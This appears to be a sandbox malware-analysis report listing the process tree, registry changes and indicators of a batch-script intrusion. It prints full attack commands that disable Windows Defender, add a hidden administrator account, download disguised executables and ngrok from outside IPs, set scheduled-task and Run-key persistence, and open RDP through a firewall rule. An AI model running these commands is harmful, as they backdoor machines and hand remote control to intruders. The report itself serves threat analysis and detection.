Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4032	PING.EXE
1100	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3668	schtasks.exe
3292	schtasks.exe
5332	schtasks.exe
5508	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5332	powershell.exe
5332	powershell.exe
1900	powershell.exe
1900	powershell.exe
3464	powershell.exe
3464	powershell.exe
3416	powershell.exe
3416	powershell.exe
1552	powershell.exe
1552	powershell.exe
5716	powershell.exe
5716	powershell.exe
5768	powershell.exe
5768	powershell.exe
3268	powershell.exe
3268	powershell.exe
1444	powershell.exe
1444	powershell.exe
6024	powershell.exe
6024	powershell.exe
4520	powershell.exe
4520	powershell.exe
2916	powershell.exe
2916	powershell.exe
4916	powershell.exe
4916	powershell.exe
2764	svchost.exe
2764	svchost.exe
2764	svchost.exe
2764	svchost.exe
704	powershell.exe
704	powershell.exe
5720	powershell.exe
5720	powershell.exe
5520	powershell.exe
5520	powershell.exe
4188	powershell.exe
4188	powershell.exe
452	svchost.exe
452	svchost.exe
452	svchost.exe
452	svchost.exe
5364	svchost.exe
5364	svchost.exe
5364	svchost.exe
5364	svchost.exe
5152	svchost.exe
5152	svchost.exe
5152	svchost.exe
5152	svchost.exe
6004	powershell.exe
6004	powershell.exe
3148	svchost.exe
3148	svchost.exe
3148	svchost.exe
3148	svchost.exe
4904	svchost.exe
4904	svchost.exe
4904	svchost.exe
4904	svchost.exe
5780	svchost.exe
5780	svchost.exe
5780	svchost.exe
5780	svchost.exe

Suspicious behavior: LoadsDriver 11 IoCs

pid	Process
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5332	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	5988	wmic.exe
Token: SeIncreaseQuotaPrivilege	5988	wmic.exe
Token: SeSecurityPrivilege	5988	wmic.exe
Token: SeTakeOwnershipPrivilege	5988	wmic.exe
Token: SeLoadDriverPrivilege	5988	wmic.exe
Token: SeSystemtimePrivilege	5988	wmic.exe
Token: SeBackupPrivilege	5988	wmic.exe
Token: SeRestorePrivilege	5988	wmic.exe
Token: SeShutdownPrivilege	5988	wmic.exe
Token: SeSystemEnvironmentPrivilege	5988	wmic.exe
Token: SeUndockPrivilege	5988	wmic.exe
Token: SeManageVolumePrivilege	5988	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	5988	wmic.exe
Token: SeIncreaseQuotaPrivilege	5988	wmic.exe
Token: SeSecurityPrivilege	5988	wmic.exe
Token: SeTakeOwnershipPrivilege	5988	wmic.exe
Token: SeLoadDriverPrivilege	5988	wmic.exe
Token: SeSystemtimePrivilege	5988	wmic.exe
Token: SeBackupPrivilege	5988	wmic.exe
Token: SeRestorePrivilege	5988	wmic.exe
Token: SeShutdownPrivilege	5988	wmic.exe
Token: SeSystemEnvironmentPrivilege	5988	wmic.exe
Token: SeUndockPrivilege	5988	wmic.exe
Token: SeManageVolumePrivilege	5988	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	5272	wmic.exe
Token: SeIncreaseQuotaPrivilege	5272	wmic.exe
Token: SeSecurityPrivilege	5272	wmic.exe
Token: SeTakeOwnershipPrivilege	5272	wmic.exe
Token: SeLoadDriverPrivilege	5272	wmic.exe
Token: SeSystemtimePrivilege	5272	wmic.exe
Token: SeBackupPrivilege	5272	wmic.exe
Token: SeRestorePrivilege	5272	wmic.exe
Token: SeShutdownPrivilege	5272	wmic.exe
Token: SeSystemEnvironmentPrivilege	5272	wmic.exe
Token: SeUndockPrivilege	5272	wmic.exe
Token: SeManageVolumePrivilege	5272	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	5272	wmic.exe
Token: SeIncreaseQuotaPrivilege	5272	wmic.exe
Token: SeSecurityPrivilege	5272	wmic.exe
Token: SeTakeOwnershipPrivilege	5272	wmic.exe
Token: SeLoadDriverPrivilege	5272	wmic.exe
Token: SeSystemtimePrivilege	5272	wmic.exe
Token: SeBackupPrivilege	5272	wmic.exe
Token: SeRestorePrivilege	5272	wmic.exe
Token: SeShutdownPrivilege	5272	wmic.exe
Token: SeSystemEnvironmentPrivilege	5272	wmic.exe
Token: SeUndockPrivilege	5272	wmic.exe
Token: SeManageVolumePrivilege	5272	wmic.exe
Token: SeDebugPrivilege	5716	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1836	wmic.exe
Token: SeIncreaseQuotaPrivilege	1836	wmic.exe
Token: SeSecurityPrivilege	1836	wmic.exe
Token: SeTakeOwnershipPrivilege	1836	wmic.exe
Token: SeLoadDriverPrivilege	1836	wmic.exe
Token: SeSystemtimePrivilege	1836	wmic.exe
Token: SeBackupPrivilege	1836	wmic.exe
Token: SeRestorePrivilege	1836	wmic.exe
Token: SeShutdownPrivilege	1836	wmic.exe
Token: SeSystemEnvironmentPrivilege	1836	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2908 wrote to memory of 5332	2908	cmd.exe	78
PID 2908 wrote to memory of 5332	2908	cmd.exe	78
PID 2908 wrote to memory of 6100	2908	cmd.exe	79
PID 2908 wrote to memory of 6100	2908	cmd.exe	79
PID 6100 wrote to memory of 4588	6100	cmd.exe	80
PID 6100 wrote to memory of 4588	6100	cmd.exe	80
PID 2908 wrote to memory of 6124	2908	cmd.exe	81
PID 2908 wrote to memory of 6124	2908	cmd.exe	81
PID 2908 wrote to memory of 6124	2908	cmd.exe	81
PID 2908 wrote to memory of 1900	2908	cmd.exe	84
PID 2908 wrote to memory of 1900	2908	cmd.exe	84
PID 2908 wrote to memory of 3464	2908	cmd.exe	85
PID 2908 wrote to memory of 3464	2908	cmd.exe	85
PID 2908 wrote to memory of 3416	2908	cmd.exe	86
PID 2908 wrote to memory of 3416	2908	cmd.exe	86
PID 2908 wrote to memory of 1552	2908	cmd.exe	87
PID 2908 wrote to memory of 1552	2908	cmd.exe	87
PID 2908 wrote to memory of 5432	2908	cmd.exe	88
PID 2908 wrote to memory of 5432	2908	cmd.exe	88
PID 5432 wrote to memory of 3136	5432	net.exe	89
PID 5432 wrote to memory of 3136	5432	net.exe	89
PID 2908 wrote to memory of 5264	2908	cmd.exe	90
PID 2908 wrote to memory of 5264	2908	cmd.exe	90
PID 5264 wrote to memory of 4492	5264	net.exe	91
PID 5264 wrote to memory of 4492	5264	net.exe	91
PID 2908 wrote to memory of 4912	2908	cmd.exe	92
PID 2908 wrote to memory of 4912	2908	cmd.exe	92
PID 4912 wrote to memory of 2640	4912	net.exe	93
PID 4912 wrote to memory of 2640	4912	net.exe	93
PID 2908 wrote to memory of 2376	2908	cmd.exe	94
PID 2908 wrote to memory of 2376	2908	cmd.exe	94
PID 2908 wrote to memory of 1740	2908	cmd.exe	95
PID 2908 wrote to memory of 1740	2908	cmd.exe	95
PID 1740 wrote to memory of 2244	1740	net.exe	96
PID 1740 wrote to memory of 2244	1740	net.exe	96
PID 2908 wrote to memory of 2912	2908	cmd.exe	97
PID 2908 wrote to memory of 2912	2908	cmd.exe	97
PID 2912 wrote to memory of 4548	2912	net.exe	98
PID 2912 wrote to memory of 4548	2912	net.exe	98
PID 2908 wrote to memory of 4392	2908	cmd.exe	99
PID 2908 wrote to memory of 4392	2908	cmd.exe	99
PID 4540 wrote to memory of 5988	4540	MeshAgent.exe	100
PID 4540 wrote to memory of 5988	4540	MeshAgent.exe	100
PID 4540 wrote to memory of 5988	4540	MeshAgent.exe	100
PID 2908 wrote to memory of 4648	2908	cmd.exe	102
PID 2908 wrote to memory of 4648	2908	cmd.exe	102
PID 2908 wrote to memory of 4624	2908	cmd.exe	103
PID 2908 wrote to memory of 4624	2908	cmd.exe	103
PID 2908 wrote to memory of 4656	2908	cmd.exe	104
PID 2908 wrote to memory of 4656	2908	cmd.exe	104
PID 2908 wrote to memory of 1384	2908	cmd.exe	105
PID 2908 wrote to memory of 1384	2908	cmd.exe	105
PID 2908 wrote to memory of 5536	2908	cmd.exe	106
PID 2908 wrote to memory of 5536	2908	cmd.exe	106
PID 2908 wrote to memory of 4464	2908	cmd.exe	107
PID 2908 wrote to memory of 4464	2908	cmd.exe	107
PID 2908 wrote to memory of 1588	2908	cmd.exe	108
PID 2908 wrote to memory of 1588	2908	cmd.exe	108
PID 2908 wrote to memory of 5560	2908	cmd.exe	109
PID 2908 wrote to memory of 5560	2908	cmd.exe	109
PID 2908 wrote to memory of 1256	2908	cmd.exe	110
PID 2908 wrote to memory of 1256	2908	cmd.exe	110
PID 4540 wrote to memory of 5272	4540	MeshAgent.exe	111
PID 4540 wrote to memory of 5272	4540	MeshAgent.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3028	attrib.exe
2864	attrib.exe
2588	attrib.exe
5612	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5332
- C:\Windows\system32\cmd.exe
  cmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:6100
- - C:\Windows\system32\net.exe
    net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
    3⤵
    PID:4588
- \??\UNC\45.139.196.250\shear\s.exe
  \\45.139.196.250\shear\s.exe -fullinstall
  2⤵
  - Sets service image path in registry
  - Drops file in Program Files directory
  PID:6124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'c:\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1552
- C:\Windows\system32\net.exe
  net user t1 Raed12346@@ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 Raed12346@@ /add
    3⤵
    PID:3136
- C:\Windows\system32\net.exe
  net localgroup administrators t1 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators t1 /add
    3⤵
    PID:4492
- C:\Windows\system32\net.exe
  net localgroup Administratörer t1 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administratörer t1 /add
    3⤵
    PID:2640
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
  2⤵
  - Hide Artifacts: Hidden Users
  PID:2376
- C:\Windows\system32\net.exe
  net user t1 /active:no
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 /active:no
    3⤵
    PID:2244
- C:\Windows\system32\net.exe
  net user t1 /active:yes
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 /active:yes
    3⤵
    PID:4548
- C:\Windows\system32\ReAgentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in Windows directory
  PID:4392
- C:\Windows\system32\reg.exe
  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
  2⤵
  PID:4648
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:4624
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:4656
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:1384
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:5536
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
  2⤵
  PID:4464
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1588
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:5560
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:1256
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
  2⤵
  PID:4732
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:6020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4520
- C:\Windows\system32\attrib.exe
  attrib +s +h C:\programdata\Windata
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:3028
- C:\Windows\system32\attrib.exe
  attrib +s +h C:\programdata\Windata\*.*
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:2864
- C:\Windows\system32\attrib.exe
  attrib -s +h C:\programdata\Windata\*.bat
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:2588
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3292
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5332
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5508
- C:\Windows\system32\reg.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
  2⤵
  - Adds Run key to start application
  PID:5892
- C:\Windows\system32\reg.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
  2⤵
  - Adds Run key to start application
  PID:4972
- C:\Windows\system32\attrib.exe
  attrib -s +h C:\programdata\Windata\*.bat
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:5612
- C:\Windows\system32\cmd.exe
  cmd /C C:\ProgramData\Windata\installer.bat
  2⤵
  - Drops file in Program Files directory
  PID:2828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4916
- - C:\Windows\system32\cmd.exe
    cmd /C C:\ProgramData\Windata\hrdp\install.bat
    3⤵
    PID:2232
  - - C:\ProgramData\Windata\hrdp\RDPWInst.exe
      "C:\ProgramData\Windata\hrdp\RDPWInst" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:1868
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:5720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "update.zip" -DestinationPath "."
    3⤵
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:5520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
    3⤵
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4188
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
    3⤵
    - Drops file in Program Files directory
    PID:1072
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:5868
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2928
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2976
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:3012
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2924
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1796
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4272
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:5252
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4908
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4280
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
    3⤵
    - Drops file in Program Files directory
    PID:5472
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:1224
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5036
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2100
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:2968
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3292
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:5852
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:5824
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:3440
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4720
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:5892
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4892
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:132
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1412
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1320
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
      4⤵
      Executes dropped EXE
      PID:6000
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
    3⤵
    PID:5488
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:4528
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:10
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6004
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
    3⤵
    - Drops file in Program Files directory
    PID:2980
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:3928
  - - C:\Windows\system32\sc.exe
      sc queryex "TermService"
      4⤵
      Launches sc.exe
      PID:1684
  - - C:\Windows\system32\find.exe
      find "STATE"
      4⤵
      PID:2768
  - - C:\Windows\system32\find.exe
      find /v "RUNNING"
      4⤵
      PID:1388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c query session rdp-tcp
      4⤵
      PID:3464
    - - C:\Windows\system32\query.exe
        
        query session rdp-tcp
        5⤵
        
        PID:680
      - C:\Windows\system32\qwinsta.exe
        
        "C:\Windows\system32\qwinsta.exe" rdp-tcp
        6⤵
        
        PID:5056
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"
      4⤵
      Server Software Component: Terminal Services DLL
      PID:5740
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5692
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5272
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
